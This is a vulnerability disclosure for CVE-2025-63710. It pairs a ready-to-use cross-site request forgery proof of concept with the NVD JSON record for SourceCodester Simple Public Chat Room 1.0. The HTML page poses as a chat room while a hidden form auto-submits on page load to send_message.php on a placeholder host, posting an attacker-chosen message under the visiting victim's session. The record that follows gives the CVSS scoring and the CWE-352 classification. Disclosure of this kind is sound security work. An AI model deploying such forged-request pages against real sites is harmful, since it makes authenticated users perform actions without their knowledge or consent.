CVE-2025-63710

<!-- CSRF PoC for CVE-2025-63710 --> <!-- Target: SourceCodester Simple Public Chat Room 1.0 send_message.php --> <!DOCTYPE html> <html> <head> <title>Chat Message</title> </head> <body> <h1>Welcome to Chat Room</h1> <p>Loading messages...</p> <!-- Auto-submit CSRF form --> <form id="csrfForm" action="http://TARGET_HOST/simple-public-chat-room/send_message.php" method="POST" style="display:none;"> <input type="hidden" name="message" value="[CSRF] Malicious message injected by attacker"> <input type="hidden" name="chat_room" value="1"> </form> <script> // Auto-submit the form when page loads document.addEventListener('DOMContentLoaded', function() { console.log('Submitting message...'); document.getElementById('csrfForm').submit(); }); </script> </body> </html>

{"cve": {"id": "CVE-2025-63710", "sourceIdentifier": "[email protected]", "published": "2025-11-10T15:15:37.920", "lastModified": "2025-11-17T18:18:39.677", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The send_message.php endpoint in SourceCodester Simple Public Chat Room 1.0 is vulnerable to Cross-Site Request Forgery (CSRF). The application does not implement any CSRF-protection mechanisms such as tokens, nonces, or same-site cookie restrictions. An attacker can create a malicious HTML page that, when visited by an authenticated user, will automatically submit a forged POST request to the vulnerable endpoint. This request will be executed with the victim's privileges, allowing the attacker to perform unauthorized actions on their behalf, such as sending arbitrary messages in any chat room."}, {"lang": "es", "value": "El endpoint send_message.php en SourceCodester Simple Public Chat Room 1.0 es vulnerable a falsificación de petición en sitios cruzados (CSRF). La aplicación no implementa ningún mecanismo de protección contra CSRF, como tokens, nonces o restricciones de cookie de mismo sitio. Un atacante puede crear una página HTML maliciosa que, cuando es visitada por un usuario autenticado, enviará automáticamente una petición POST falsificada al endpoint vulnerable. Esta petición se ejecutará con los privilegios de la víctima, permitiendo al atacante realizar acciones no autorizadas en su nombre, como enviar mensajes arbitrarios en cualquier sala de chat."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:pijey:simple_public_chat_room:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "4333F6E1-DB7B-451F-96FD-437425AFA15A"}]}]}], "references": [{"url": "https://github.com/floccocam-cpu/CVE-Research-2025/blob/main/CVE-2025-63710/README2.md", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Third Party Advisory"]}, {"url": "https://www.sourcecodester.com/php/12295/simple-public-chat-room-using-php.html", "source": "[email protected]", "tags": ["Product"]}]}}